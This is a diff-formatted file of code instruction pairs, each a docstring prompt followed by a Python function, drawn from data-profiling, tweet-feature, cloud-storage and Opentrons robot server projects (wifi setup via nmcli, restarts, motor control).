+ elif cfg.pie.slices == cfg.value_table.ngroups and cfg.pie.sort_descending:
+ data["value_table"] = data["pie"]
+ else:
+ data["value_table"] = grps.nlargest(cfg.value_table.ngroups)
+ if cfg.insight.enable:
+ data["chisq"] = chisquare(grps.values)
+ df = grps.reset_index()
+ if cfg.stats.enable or cfg.value_table.enable:
+ data.update(_calc_nom_stats(srs, df, data["nrows"], data["nuniq"]))
+ elif cfg.wordfreq.enable and cfg.insight.enable:
+ data["len_stats"] = {"Minimum": srs.str.len().min(), "Maximum": srs.str.len().max()}
+ if cfg.wordlen.enable:
+ lens = srs.str.len()
+ data["len_hist"] = da.histogram(lens, cfg.wordlen.bins, (lens.min(), lens.max()))
+ if cfg.wordcloud.enable or cfg.wordfreq.enable:
+ if all(
+ getattr(cfg.wordcloud, att) == getattr(cfg.wordfreq, att)
+ for att in ("top_words", "stopword", "stem", "lemmatize")
+ ):
+ word_freqs = _calc_word_freq(
+ df,
+ cfg.wordfreq.top_words,
+ cfg.wordfreq.stopword,
+ cfg.wordfreq.lemmatize,
+ cfg.wordfreq.stem,
+ )
+ data["word_cnts_cloud"] = word_freqs["word_cnts"]
+ data["nuniq_words_cloud"] = word_freqs["nuniq_words"]
+ else:
+ word_freqs = _calc_word_freq(
+ df.copy(),
+ cfg.wordfreq.top_words,
+ cfg.wordfreq.stopword,
+ cfg.wordfreq.lemmatize,
+ cfg.wordfreq.stem,
+ )
+ word_freqs_cloud = _calc_word_freq(
+ df,
+ cfg.wordcloud.top_words,
+ cfg.wordcloud.stopword,
+ cfg.wordcloud.lemmatize,
+ cfg.wordcloud.stem,
+ )
+ data["word_cnts_cloud"] = word_freqs_cloud["word_cnts"]
+ data["nuniq_words_cloud"] = word_freqs["nuniq_words"]
+ data["word_cnts_freq"] = word_freqs["word_cnts"]
+ data["nwords_freq"] = word_freqs["nwords"]
+ return data
+[INST] All computations required for plot(df, Continuous). [/INST] def cont_comps(srs: dd.Series, cfg: Config) -> Dict[str, Any]:
+ data: Dict[str, Any] = {}
+ data["nrows"] = srs.shape[0]
+ srs = srs.dropna()
+ data["npres"] = srs.shape[0]
+ srs = srs[~srs.isin({np.inf, -np.inf})]
+ if cfg.hist.enable or cfg.qqnorm.enable and cfg.insight.enable:
+ data["hist"] = da.histogram(srs, cfg.hist.bins, (srs.min(), srs.max()))
+ if cfg.insight.enable:
+ data["norm"] = normaltest(data["hist"][0])
+ if cfg.hist.enable and cfg.insight.enable:
+ data["chisq"] = chisquare(data["hist"][0])
+ if cfg.qqnorm.enable:
+ data["qntls"] = srs.quantile(np.linspace(0.01, 0.99, 99))
+ elif cfg.stats.enable:
+ data["qntls"] = srs.quantile([0.05, 0.25, 0.5, 0.75, 0.95])
+ elif cfg.box.enable:
+ data["qntls"] = srs.quantile([0.25, 0.5, 0.75])
+ if cfg.stats.enable or cfg.hist.enable and cfg.insight.enable:
+ data["skew"] = skew(srs)
+ if cfg.stats.enable or cfg.qqnorm.enable:
+ data["mean"] = srs.mean()
+ data["std"] = srs.std()
+ if cfg.stats.enable:
+ data["min"] = srs.min()
+ data["max"] = srs.max()
+ data["nreals"] = srs.shape[0]
+ data["nzero"] = (srs == 0).sum()
+ data["nneg"] = (srs < 0).sum()
+ data["kurt"] = kurtosis(srs)
+ data["mem_use"] = srs.memory_usage(deep=True)
+ if cfg.kde.enable:
+ if not math.isclose(dask.compute(data["min"])[0], dask.compute(data["max"])[0]):
+ data["dens"] = da.histogram(srs, cfg.kde.bins, (srs.min(), srs.max()), density=True)
+ data["kde"] = gaussian_kde(
+ srs.map_partitions(lambda x: x.sample(min(1000, x.shape[0])), meta=srs)
+ )
+ else:
+ data["kde"] = None
+ if cfg.box.enable:
+ data.update(_calc_box(srs, data["qntls"], cfg))
+ if cfg.value_table.enable:
+ value_counts = srs.value_counts(sort=False)
+ data["nuniq"] = value_counts.shape[0]
+ data["value_table"] = value_counts.nlargest(cfg.value_table.ngroups)
+ elif cfg.stats.enable:
+ data["nuniq"] = srs.nunique_approx()
+ return data
+[INST] Parse a categorical column of text data into words, then compute
+the frequency distribution of words and the total number of words.. [/INST] def _calc_word_freq(
+ df: dd.DataFrame,
+ top_words: int,
+ stopword: bool,
+ lemmatize: bool,
+ stem: bool,
+) -> Dict[str, Any]:
+ col = df.columns[0]
+ regex = fr"\b(?:{'|'.join(ess)})\b|[^\w+ ]" if stopword else r"[^\w+ ]"
+ df[col] = df[col].str.replace(regex, "").str.lower().str.split()
+ df = df.explode(col)
+ if lemmatize or stem:
+ df[col] = df[col].dropna()
+ if lemmatize:
+ df[col] = df[col].apply(WordNetLemmatizer().lemmatize, meta=object)
+ if stem:
+ df[col] = df[col].apply(PorterStemmer().stem, meta=object)
+ word_cnts = df.groupby(col)[df.columns[1]].sum()
+ nwords = word_cnts.sum()
+ nuniq_words = word_cnts.shape[0]
+ fnl_word_cnts = word_cnts.nlargest(top_words)
+ return {"word_cnts": fnl_word_cnts, "nwords": nwords, "nuniq_words": nuniq_words}
+[INST] Calculate statistics for a nominal column. [/INST] def _calc_nom_stats(
+ srs: dd.Series,
+ df: dd.DataFrame,
+ nrows: int,
+ nuniq: dd.core.Scalar,
+) -> Dict[str, Any]:
+ stats = {
+ "nrows": nrows,
+ "npres": srs.shape[0],
+ "nuniq": nuniq,
+ "mem_use": srs.memory_usage(deep=True),
+ "first_rows": srs.reset_index(drop=True).loc[:4],
+ }
+ leng = {
+ "Mean": srs.str.len().mean(),
+ "Standard Deviation": srs.str.len().std(),
+ "Median": srs.str.len().quantile(0.5),
+ "Minimum": srs.str.len().min(),
+ "Maximum": srs.str.len().max(),
+ }
+ grp, col = df.columns
+ lc_cnt = (df[grp].str.count(r"[a-z]") * df[col]).sum()
+ uc_cnt = (df[grp].str.count(r"[A-Z]") * df[col]).sum()
+ letter = {
+ "Count": lc_cnt + uc_cnt,
+ "Lowercase Letter": lc_cnt,
+ "Space Separator": (df[grp].str.count(r"[ ]") * df[col]).sum(),
+ "Uppercase Letter": uc_cnt,
+ "Dash Punctuation": (df[grp].str.count(r"[-]") * df[col]).sum(),
+ "Decimal Number": (df[grp].str.count(r"[0-9]") * df[col]).sum(),
+ }
+ return {"stats": stats, "len_stats": leng, "letter_stats": letter}
+[INST] Calculate stats from a datetime column. [/INST] def calc_stats_dt(srs: dd.Series) -> Dict[str, str]:
+ size = srs.shape[0]
+ count = srs.count()
+ try:
+ uniq_count = srs.nunique_approx()
+ except:
+ uniq_count = srs.nunique()
+ overview_dict = {
+ "Distinct Count": uniq_count,
+ "Approximate Unique (%)": uniq_count / count,
+ "Missing": size - count,
+ "Missing (%)": 1 - (count / size),
+ "Memory Size": srs.memory_usage(deep=True),
+ "Minimum": srs.min(),
+ "Maximum": srs.max(),
+ }
+ return overview_dict
+[INST] This function apply clean functions on input dataset.. [/INST] def clean_data() -> Any:
+ info = request.get_json()
+ clean_func = info["clean_func"]
+ col = info["col"]
+ global index_df
+ df_cleaned = clean_function_dic[clean_func](index_df, column=col, inplace=True)
+ df_cleaned = df_cleaned.astype(str)
+ col_names = df_cleaned.columns.values.tolist()
+ table_columns = []
+ for col_name in col_names:
+ temp_dic = {}
+ temp_dic["colName"] = col_name
+ temp_dic["colLabel"] = col_name
+ temp_dic["colWidth"] = 180
+ table_columns.append(temp_dic)
+ transposed_json = df_cleaned.T.to_dict()
+ table_data = []
+ for key in transposed_json:
+ table_data.append(transposed_json[key])
+ index_df = df_cleaned
+ return {"tableData": table_data, "tableColumns": table_columns}
+[INST] @return return a list containing all the extension of the implemented data structures. [/INST] def extensions_generator():
+ extensions = []
+ for dse in impl_data_structure:
+ ds_source = glob.glob("cy_alg/{}.pyx".format(dse.py_name))
+ ds_source += glob.glob("c_alg/src/{}.c".format(dse.c_name))
+ if dse.other_src:
+ for src in dse.other_src:
+ ds_source += glob.glob(src)
+ extension = Extension(
+ dse.py_name,
+ sources=ds_source,
+ include_dirs=inc_dirs,
+ library_dirs=lib_dirs,
+ libraries=libs,
+ )
+ extensions.append(extension)
+ return extensions
+[INST] Takes a not-yet-processed tweet in the form of [word1, word2, ..., wordn]
+Returns a list of manual features adapted from ../resource/2872427.2883062.pdf
+
+length of comment in tokens
+average length of word
+number of periods, question marks, quotes, and exclamation marks
+number of one letter tokens
+number of capitalized letters
+number of non-alpha characters. [/INST] def extract_manual_features(tweet):
+ length = len(tweet)
+ averageWordLength = sum([len(word) for word in tweet])//length
+ oneLetter = sum([1 for word in tweet if len(word) == 1])
+ tweet = " ".join(tweet)
+ punctuationCount = 0
+ for each in [".","?","\"","\'","!"]:
+ punctuationCount += tweet.count(each)
+ capitalized = 0
+ nonAlpha = 0
+ for each in tweet:
+ if each.isupper():
+ capitalized += 1
+ if not each.isalpha() and each != " ":
+ nonAlpha += 1
+ manual_features = [length, averageWordLength, oneLetter, punctuationCount, capitalized, nonAlpha]
+ return manual_features
+[INST] Takes a file with each line being one word
+Returns a list of lowercase word. [/INST] def process_words(words):
+ wordList = []
+ for word in words:
+ wordList.append(word.strip().lower())
+ return wordList
+[INST] Takes a list of processed tweets
+Returns a feature matrix
+See detailed comments below. [/INST] def generate_matrix(tweets, words):
+ wordsLentgh = len(words)
+ featureMatrix = []
+ for tweet in tweets:
+ featureVector = [0] * wordsLentgh
+ for i in range(wordsLentgh):
+ featureVector[i] = tweet[2].count(words[i])
+ featureVector.extend(tweet[3])
+ featureVector.append(tweet[4])
+ featureMatrix.append(featureVector)
+ return featureMatrix
+[INST] put_object
+object storage service file upload. [/INST] def put_object(bucketName, objectName, content):
+ signer = oci.auth.signers.get_resource_principals_signer()
+ client = oci.object_storage.ObjectStorageClient(config={}, signer=signer)
+ namespace = client.get_namespace().data
+ output=""
+ try:
+ object = client.put_object(namespace, bucketName, objectName, content)
+ output = "Success: Put object '" + objectName + "' in bucket '" + bucketName + "'"
+ except Exception as e:
+ output = "Failed: " + str(e.message)
+ return { "state": output }
+[INST] shell_exec
+invoke the shell to run a local command. [/INST] def shell_exec(exec_command, exec_count):
+ p_response = Popen([exec_command],
+ shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
+ )
+ output, errors = p_response.communicate()
+ logging.info("Popen Output " + str(exec_count) + ": " + output)
+ logging.info("Popen Errors " + str(exec_count) + ": " + errors)
+ return
+[INST] Reads from socket until all messages from the list are received
+Returns the list of messages read. [/INST] async def read_until(socket, messages):
+ messages = messages.copy()
+ res = []
+ while messages:
+ data = await socket.receive_json()
+ res += [data]
+ if data in messages:
+ messages.remove(data)
+ return res
+[INST] Set flow rate in uL/mm, to value obtained from command's params,
+or if unspecified in command params, then from protocol's "default-values".. [/INST] def _set_flow_rate(
+ pipette_model, pipette, command_type, params, default_values):
+ default_aspirate = default_values.get(
+ 'aspirate-flow-rate', {}).get(pipette_model)
+ default_dispense = default_values.get(
+ 'dispense-flow-rate', {}).get(pipette_model)
+ flow_rate_param = params.get('flow-rate')
+ if flow_rate_param is not None:
+ if command_type == 'aspirate':
+ pipette.set_flow_rate(
+ aspirate=flow_rate_param,
+ dispense=default_dispense)
+ return
+ if command_type == 'dispense':
+ pipette.set_flow_rate(
+ aspirate=default_aspirate,
+ dispense=flow_rate_param)
+ return
+ pipette.set_flow_rate(
+ aspirate=default_aspirate,
+ dispense=default_dispense
+ )
+[INST] This is the (somewhat) synchronous method to use to do a restart.
+It actually starts a thread that does the restart. `__wait_and_restart`,
+on the other hand, should not be called directly, because it will block
+until the system restarts.. [/INST] def do_restart():
+ Thread(target=__wait_and_restart).start()
+[INST] Delay and then execute the restart. Do not call directly.. [/INST] def __wait_and_restart():
+ log.info('Restarting server')
+ sleep(1)
+ loop = asyncio.new_event_loop()
+ loop.run_until_complete(_resin_supervisor_restart())
+[INST] Execute a container restart by requesting it from the supervisor.
+Note that failures here are returned but most likely will not be
+sent back to the caller, since this is run in a separate workthread.
+If the system is not responding, look for these log messages.. [/INST] async def _resin_supervisor_restart():
+ supervisor = os.environ.get('RESIN_SUPERVISOR_ADDRESS',
+ 'http://127.0.0.1:48484')
+ restart_url = supervisor + '/v1/restart'
+ api = os.environ.get('RESIN_SUPERVISOR_API_KEY', 'unknown')
+ app_id = os.environ.get('RESIN_APP_ID', 'unknown')
+ async with aiohttp.ClientSession() as session:
+ async with session.post(restart_url,
+ params={'apikey': api},
+ json={'appId': app_id,
+ 'force': True}) as resp:
+ body = await resp.read()
+ if resp.status != 202:
+ log.error("Could not shut down: {}: {}"
+ .format(resp.status, body))
+[INST] Returns OK, then waits approximately 1 second and restarts container. [/INST] async def restart(request):
+ do_restart()
+ return web.json_response({"message": "restarting"})
+[INST] List the visible (broadcasting SSID) wireless networks.
+Returns a list of the SSIDs. They may contain spaces and should be escaped
+if later passed to a shell.. [/INST] async def available_ssids():
+ fields = ['ssid', 'signal', 'active']
+ cmd = ['--terse',
+ '--fields',
+ ','.join(fields),
+ 'device',
+ 'wifi',
+ 'list']
+ out, _ = await _call(cmd)
+ return _dict_from_terse_tabular(
+ fields, out,
+ transformers={'signal': lambda s: int(s) if s.isdigit() else None,
+ 'active': lambda s: s.lower() == 'yes'})
+[INST] Return the list of configured connections.
+This is all connections that nmcli knows about and manages.
+Each connection is a dict containing some basic information - the
+information retrievable from nmcli connection show. Further information
+should be queried on a connection by connection basis.
+
+If for_type is not None, it should be a str containing an element of
+CONNECTION_TYPES, and results will be limited to that connection type.. [/INST] async def connections(for_type=None):
+ fields = ['name', 'type', 'active']
+ res, _ = await _call(['-t', '-f', ','.join(fields), 'connection', 'show'])
+ found = _dict_from_terse_tabular(
+ fields,
+ res,
+ transformers={'type': lambda s: s.split('-')[-1],
+ 'active': lambda s: s.lower() == 'yes'}
+ )
+ if for_type is not None:
+ if for_type not in CONNECTION_TYPES:
+ raise ValueError('typename {} not in valid connections types {}'
+ .format(for_type, CONNECTION_TYPES))
+ should_return = []
+ for c in found:
+ if c['type'] == for_type:
+ should_return.append(c)
+ return should_return
+ else:
+ return found
+[INST] If there is already a connection for this ssid, return the name of
+the connection; if there is not, return None.. [/INST] async def connection_exists(ssid):
+ nmcli_conns = await connections()
+ for wifi in [c['name']
+ for c in nmcli_conns if c['type'] == 'wireless']:
+ res, _ = await _call(['-t', '-f', '802-11-wireless.ssid',
+ '-m', 'tabular',
+ 'connection', 'show', wifi])
+ if res == ssid:
+ return wifi
+ return None
+[INST] Delete all connections of con_type but the one specified.. [/INST] async def _trim_old_connections(new_name, con_type):
+ existing_cons = await connections(for_type=con_type)
+ not_us = [c['name'] for c in existing_cons if c['name'] != new_name]
+ ok = True
+ res = []
+ for c in not_us:
+ this_ok, remove_res = await remove(name=c)
+ ok = ok and this_ok
+ if not this_ok:
+ log.warning("Could not remove wifi connection {}: {}"
+ .format(c, remove_res))
+ res.append(remove_res)
+ else:
+ log.debug("Removed old wifi connection {}".format(c))
+ return ok, ';'.join(res)
+[INST] Configure a connection but do not bring it up (though it is configured
+for autoconnect).
+
+
+
+Only anticipated failures are treated that way - for instance, an ssid
+that doesn't exist will get a False and a message; a system where nmcli
+is not found will raise a CalledProcessError.
+
+The ssid is mandatory. If security_type is 'wpa-psk', the psk must be
+specified; if security_type is 'none', the psk will be ignored.
+
+If security_type is not specified, it will be inferred from the specified
+arguments.. [/INST] async def configure(ssid,
+ security_type=None,
+ psk=None,
+ hidden=False,
+ up_retries=3):
+ if None is security_type and None is not psk:
+ security_type = 'wpa-psk'
+ if security_type and security_type not in SUPPORTED_SECURITY_TYPES:
+ message = 'Only security types {} are supported'\
+ .format(SUPPORTED_SECURITY_TYPES)
+ log.error("Specified security type <{}> is not supported"
+ .format(security_type))
+ return False, message
+ already = await connection_exists(ssid)
+ if already:
+ _1, _2 = await _call(['connection', 'delete', already])
+ configure_cmd = ['connection', 'add',
+ 'save', 'yes',
+ 'autoconnect', 'yes',
+ 'ifname', 'wlan0',
+ 'type', 'wifi',
+ 'con-name', ssid,
+ 'wifi.ssid', ssid]
+ if security_type:
+ configure_cmd += ['wifi-sec.key-mgmt', security_type]
+ if psk:
+ configure_cmd += ['wifi-sec.psk', psk]
+ if hidden:
+ configure_cmd += ['wifi.hidden', 'true']
+ res, err = await _call(configure_cmd)
+ uuid_matches = re.search(
+ "Connection '(.*)'[\s]+\(([\w\d-]+)\) successfully", res)
+ if not uuid_matches:
+ return False, err.split('\r')[-1]
+ name = uuid_matches.group(1)
+ uuid = uuid_matches.group(2)
+ for _ in range(up_retries):
+ res, err = await _call(['connection', 'up', 'uuid', uuid])
+ if 'Connection successfully activated' in res:
+ _1, _2 = await _trim_old_connections(name, 'wireless')
+ return True, res
+ else:
+ return False, err.split('\r')[-1]
+[INST] Remove a network. Depending on what is known, specify either ssid
+(in which case this function will call ``connection_exists`` to get the
+nmcli connection name) or the nmcli connection name directly.
+
+Returns (True, msg) if the connection was deleted, (False, msg) otherwise.. [/INST] async def remove(ssid=None, name=None) -> (bool, str):
+ if None is not ssid:
+ name = await connection_exists(ssid)
+ if None is not name:
+ res, err = await _call(['connection', 'delete', name])
+ if 'successfully deleted' in res:
+ return True, res
+ else:
+ return False, err
+ else:
+ return False, 'No connection for ssid {}'.format(ssid)
+[INST] Get the basic network configuration of an interface.
+
+which_iface should be a string in IFACE_NAMES.. [/INST] async def iface_info(which_iface):
+ if which_iface not in IFACE_NAMES:
+ raise ValueError('Bad interface name {}, not in {}'
+ .format(which_iface, IFACE_NAMES))
+ default_res = {'ipAddress': None,
+ 'macAddress': None,
+ 'gatewayAddress': None}
+ fields = ['GENERAL.HWADDR', 'IP4.ADDRESS', 'IP4.GATEWAY', 'GENERAL.STATE']
+ res, err = await _call(['--mode', 'tabular',
+ '--escape', 'no',
+ '--terse', '--fields', ','.join(fields),
+ 'dev', 'show', which_iface])
+ values = res.split('\n')
+ if len(fields) != len(values):
+ raise ValueError("Bad result from nmcli: {}".format(err))
+ default_res['macAddress'] = values[0]
+ default_res['ipAddress'] = values[1]
+ default_res['gatewayAddress'] = values[2]
+ return default_res
+[INST] Runs the command in a subprocess and returns the captured stdout output.. [/INST] async def _call(cmd) -> (str, str):
+ to_exec = [quote(c) for c in ['nmcli'] + cmd]
+ cmd_str = ' '.join(to_exec)
+ proc = await as_subprocess.create_subprocess_shell(
+ cmd_str,
+ stdout=as_subprocess.PIPE, stderr=as_subprocess.PIPE)
+ out, err = await proc.communicate()
+ out_str, err_str = out.decode().strip(), err.decode().strip()
+ sanitized = sanitize_args(to_exec)
+ log.debug('{}: stdout={}'.format(' '.join(sanitized), out_str))
+ if err_str:
+ log.info('{}: stderr={}'.format(' '.join(sanitized), err_str))
+ return out_str, err_str
+[INST] Filter the command so that it no longer contains passwords. [/INST] def sanitize_args(cmd) -> (str, str):
+ sanitized = []
+ for idx, fieldname in enumerate(cmd):
+ if idx > 0 and 'wifi-sec.psk' in cmd[idx-1]:
+ sanitized.append('****')
+ else:
+ sanitized.append(fieldname)
+ return sanitized
+[INST] Parse NMCLI terse tabular output into a list of Python dict.
+``names`` is a list of strings of field names to apply to the input data,
+which is assumed to be colon separated.
+
+``inp`` is the input as a string d) from nmcli
+
+``transformers`` is a dict mapping field names to callables of the form
+f: str -> any. If a fieldname is in transformers, that callable will be
+invoked on the field matching the name and the result stored.
+
+The return value is a list with one element per valid line of input, where
+each element is a dict with keys taken from names and values from the input. [/INST] def _dict_from_terse_tabular(names, inp, transformers={}):
+ res = []
+ for n in names:
+ if n not in transformers:
+ transformers[n] = lambda s: s
+ for line in inp.split('\n'):
+ if len(line) < 3:
+ continue
+ fields = line.split(':')
+ res.append(dict([
+ (elem[0], transformers[elem[0]](elem[1]))
+ for elem in zip(names, fields)]))
+ return res
+[INST] Unmount and remove the sqlite database (used in robot reset). [/INST] def reset():
+ if os.path.exists(database_path):
+ os.remove(database_path)
+ journal_path = database_path + '-journal'
+ if os.path.exists(journal_path):
+ os.remove(journal_path)
+[INST] Get request will return a list of discovered ssids.. [/INST] async def list_networks(request):
+ res = {"list": []}
+ try:
+ networks = await nmcli.available_ssids()
+ except subprocess.CalledProcessError as e:
+ res = "CalledProcessError: {}".format(e.stdout)
+ status = 500
+ except FileNotFoundError as e:
+ res = "FileNotFoundError: {}".format(e)
+ status = 500
+ else:
+ res["list"] = networks
+ status = 200
+ return web.json_response(res, status=status)
+[INST] Post request should include a json body specifying config information
+. Robot will attempt to connect to this network and respond
+with Ok if successful or an error code if not.
+
+Fields in the body are:
+ssid: str Required. The SSID to connect to.. [/INST] async def configure(request):
+ result = {}
+ try:
+ body = await request.json()
+ ssid = body.get('ssid')
+ psk = body.get('psk')
+ hidden = body.get('hidden')
+ security = body.get('security_type')
+ if ssid is None:
+ status = 400
+ message = 'Error: "ssid" string is required'
+ else:
+ ok, message = await nmcli.configure(ssid,
+ security_type=security,
+ psk=psk,
+ hidden=hidden)
+ status = 201 if ok else 401
+ result['ssid'] = ssid
+ except json.JSONDecodeError as e:
+ log.debug("Error: JSONDecodeError in /wifi/configure: {}".format(e))
+ status = 400
+ message = e.msg
+ except Exception as e:
+ log.warning("Error: {} in /wifi/configure': {}".format(type(e), e))
+ status = 500
+ message = 'An unexpected error occurred.'
+ result['message'] = message
+ log.debug("Wifi configure result: {}".format(result))
+ return web.json_response(data=result, status=status)
+[INST] Get request will return the status of the wifi connection from the
+RaspberryPi to the internet.
+
+The body of the response is a json dict containing. [/INST] async def status(request):
+ connectivity = {'status': 'none',
+ 'ipAddress': None,
+ 'macAddress': 'unknown',
+ 'gatewayAddress': None}
+ try:
+ connectivity['status'] = await nmcli.is_connected()
+ net_info = await nmcli.iface_info('wlan0')
+ connectivity.update(net_info)
+ log.debug("Connectivity: {}".format(connectivity['status']))
+ status = 200
+ except subprocess.CalledProcessError as e:
+ log.error("CalledProcessError: {}".format(e.stdout))
+ status = 500
+ except FileNotFoundError as e:
+ log.error("FileNotFoundError: {}".format(e))
+ status = 500
+ return web.json_response(connectivity, status=status)
+[INST] Avahi Server Version Check, return avahi version string, eg.. [/INST] def GetVersion(self):
+ try:
+ return self.server.GetVersionString()
+ except dbus.DBusException:
+ return None
+[INST] Return hostname according to the Avahi server. [/INST] def GetHostName(self):
+ try:
+ return self.server.GetHostName()
+ except dbus.DBusException:
+ return None
+[INST] Return hostname according to the Avahi server. [/INST] def GetDomainName(self):
+ try:
+ return self.server.GetDomainName()
+ except dbus.DBusException:
+ return None
+[INST] Return a new entry group for services. [/INST] def EntryGroupNew(self):
+ try:
+ return self.server.EntryGroupNew()
+ except dbus.DBusException:
+ return None
+[INST] Execute a reset of the requested parts of the user configuration.. [/INST] async def reset(request: web.Request) -> web.Response:
+ data = await request.json()
+ for requested_reset in data.keys():
+ if requested_reset not in [opt['id']
+ for opt in _settings_reset_options]:
+ log.error('Bad reset option {} requested'.format(requested_reset))
+ return web.json_response(
+ {'message': '{} is not a valid reset option'
+ .format(requested_reset)},
+ status=400)
+ log.info("Reset requested for {}".format(', '.join(data.keys())))
+ if data.get('deckCalibration'):
+ rc.clear(calibration=True, robot=False)
+ if data.get('tipProbe'):
+ config = rc.load()
+ config.tip_length.clear()
+ rc.save_robot_settings(config)
+ if data.get('labwareCalibration'):
+ db.reset()
+ if data.get('bootScripts'):
+ if os.environ.get('RUNNING_ON_PI'):
+ if os.path.exists('/data/boot.d'):
+ shutil.rmtree('/data/boot.d')
+ else:
+ log.debug('Not on pi, not removing /data/boot.d')
+ return web.json_response({}, status=200)
+[INST] Moves the robot to the specified position as provided by the `control.info`
+endpoint response. [/INST] async def move(request):
+ req = await request.text()
+ data = json.loads(req)
+ target, point, mount, model, message, error = _validate_move_data(data)
+ if error:
+ status = 400
+ else:
+ status = 200
+ if target == 'mount':
+ message = _move_mount(mount, point)
+ elif target == 'pipette':
+ pipette, _ = _fetch_or_create_pipette(mount, model)
+ pipette.move_to((robot.deck, point), strategy='arc')
+ new_position = tuple(
+ pose_tracker.absolute(pipette.robot.poses, pipette))
+ message = "Move complete. New position: {}".format(new_position)
+ return web.json_response({"message": message}, status=status)
+[INST] This initializes a call to pipette.home() which, as a side effect will:
+1. Check the pipette is actually connected (will throw an error if you
+try to home a non-connected pipette)
+2. Re-engages the motor. [/INST] async def home(request):
+ req = await request.text()
+ data = json.loads(req)
+ target = data.get('target')
+ if target in ['robot', 'pipette']:
+ if target == 'robot':
+ robot.home()
+ status = 200
+ message = "Homing robot."
+ else:
+ mount = data.get('mount')
+ if mount in ['left', 'right']:
+ pipette, should_remove = _fetch_or_create_pipette(mount)
+ pipette.home()
+ if should_remove:
+ robot.remove_instrument(mount)
+ status = 200
+ message = "Pipette on {} homed successfully.".format(mount)
+ else:
+ status = 400
+ message = "Expected 'left' or 'right' as values for mount" \
+ "got {} instead.".format(mount)
+ else:
+ status = 400
+ message = "Expected 'robot' or 'pipette' got {}.".format(target)
+ return web.json_response({"message": message}, status=status)
+[INST] Reads in an attached pipette's UUID
+The UUID is unique to this pipette, and is a string of unknown length
+
+String (str) with value 'left' or 'right'. [/INST] def read_pipette_id(self, mount):
+ if self.simulating:
+ res = '1234567890'
+ else:
+ res = self._read_from_pipette(GCODES['READ_INSTRUMENT_ID'], mount)
+ if res:
+ ret = {'pipette_id': res}
+ else:
+ ret = {'message': 'Error: Pipette ID read failed'}
+ return ret
+[INST] Reads an attached pipette's MODEL
+The MODEL is a unique string for this model of pipette
+
+:return model string, or None. [/INST] def read_pipette_model(self, mount):
+ if self.simulating:
+ res = None
+ else:
+ res = self._read_from_pipette(
+ GCODES['READ_INSTRUMENT_MODEL'], mount)
+ if res and '_v' not in res:
+ res = res + '_v1'
+ elif res and '_v13' in res:
+ res = res.replace('_v13', '_v1.3')
+ return res
+[INST] Submit a GCODE command to the robot, followed by M400 to block until
+done. This method also ensures that any command on the B or C axis
+(the axis for plunger control) do current ramp-up and ramp-down, so
+that plunger motors rest at a low current to prevent burn-out.
+
+In the case of a limit-switch alarm during any command other than home,
+the robot should home the axis from the alarm and then raise a
+SmoothieError. The robot should *not* recover and continue to run the
+protocol, as this could result in unpredicable handling of liquids.
+When a SmoothieError is raised, the user should inspect the physical
+configuration of the robot and the protocol and determine why the limit
+switch was hit unexpectedly. This is usually due to an undetected
+collision in a previous move command.. [/INST] def _send_command(self, command, timeout=DEFAULT_SMOOTHIE_TIMEOUT):
+ if self.simulating:
+ return
+ command_line = command + ' ' + SMOOTHIE_COMMAND_TERMINATOR
+ ret_code = self._recursive_write_and_return(
+ command_line, timeout, DEFAULT_COMMAND_RETRIES)
+ ret_code = self._remove_unwanted_characters(command_line, ret_code)
+ if (ERROR_KEYWORD in ret_code.lower()) or \
+ (ALARM_KEYWORD in ret_code.lower()):
+ self._reset_from_error()
+ error_axis = ret_code.strip()[-1]
+ if GCODES['HOME'] not in command and error_axis in 'XYZABC':
+ self.home(error_axis)
+ raise SmoothieError(ret_code)
+ return ret_code.strip()
+[INST] Read from an attached pipette's internal memory. The gcode used
+determines which portion of memory is read and returned.
+
+All motors must be disengaged to consistently read over I2C lines. [/INST] def _read_from_pipette(self, gcode, mount):
+ allowed_mounts = {'left': 'L', 'right': 'R'}
+ mount = allowed_mounts.get(mount)
+ if not mount:
+ raise ValueError('Unexpected mount: {}'.format(mount))
+ try:
+ self.disengage_axis('BC')
+ self.delay(CURRENT_CHANGE_DELAY)
+ res = self._send_command(gcode + mount)
+ if res:
+ res = _parse_instrument_data(res)
+ assert mount in res
+ return _byte_array_to_ascii_string(res[mount])
+ except (ParseError, AssertionError, SmoothieError):
+ pass
+[INST] Move to the `target` Smoothieware coordinate, along any of the size
+axes, XYZABC.
+
+dict
+dict setting the coordinate that Smoothieware will be at when
+`move()` returns. `target` keys are the axis in upper-case, and the
+values are the coordinate in millimeters (float)
+
+boolean (default=False)
+If set to `True`, each axis included within the target coordinate
+may be homed before moving, determined by Smoothieware's internal
+homing-status flags (`True` means it has already homed). All axes'
+flags are set to `False` by Smoothieware under three conditions:
+1) Smoothieware boots or resets, 2) if a HALT gcode or signal
+is sent, or 3) a homing/limitswitch error occured.. [/INST] def move(self, target, home_flagged_axes=False):
+ from numpy import isclose
+ self.run_flag.wait()
+ def valid_movement(coords, axis):
+ return not (
+ (axis in DISABLE_AXES) or
+ (coords is None) or
+ isclose(coords, self.position[axis])
+ )
+ def create_coords_list(coords_dict):
+ return [
+ axis + str(round(coords, GCODE_ROUNDING_PRECISION))
+ for axis, coords in sorted(coords_dict.items())
+ if valid_movement(coords, axis)
+ ]
+ backlash_target = target.copy()
+ backlash_target.update({
+ axis: value + PLUNGER_BACKLASH_MM
+ for axis, value in sorted(target.items())
+ if axis in 'BC' and self.position[axis] < value
+ })
+ target_coords = create_coords_list(target)
+ backlash_coords = create_coords_list(backlash_target)
+ if target_coords:
+ non_moving_axes = ''.join([
+ ax
+ for ax in AXES
+ if ax not in target.keys()
+ ])
+ self.dwell_axes(non_moving_axes)
+ self.activate_axes(target.keys())
+ command = self._generate_current_command()
+ if backlash_coords != target_coords:
+ command += ' ' + GCODES['MOVE'] + ''.join(backlash_coords)
+ command += ' ' + GCODES['MOVE'] + ''.join(target_coords)
+ try:
+ for axis in target.keys():
+ self.engaged_axes[axis] = True
+ if home_flagged_axes:
+ self.home_flagged_axes(''.join(list(target.keys())))
+ log.debug("move: {}".format(command))
+ self._send_command(command, timeout=DEFAULT_MOVEMENT_TIMEOUT)
+ finally:
+ plunger_axis_moved = ''.join(set('BC') & set(target.keys()))
+ if plunger_axis_moved:
+ self.dwell_axes(plunger_axis_moved)
+ self._set_saved_current()
+ self._update_position(target)
+[INST] In order to terminate Smoothie motion immediately (including
+interrupting a command in progress, we set the reset pin low and then
+back to high, then call `_setup` method to send the RESET_FROM_ERROR
+Smoothie code to return Smoothie to a normal waiting state and reset
+any other state needed for the driver.. [/INST] def kill(self):
+ log.debug("kill")
+ self._smoothie_hard_halt()
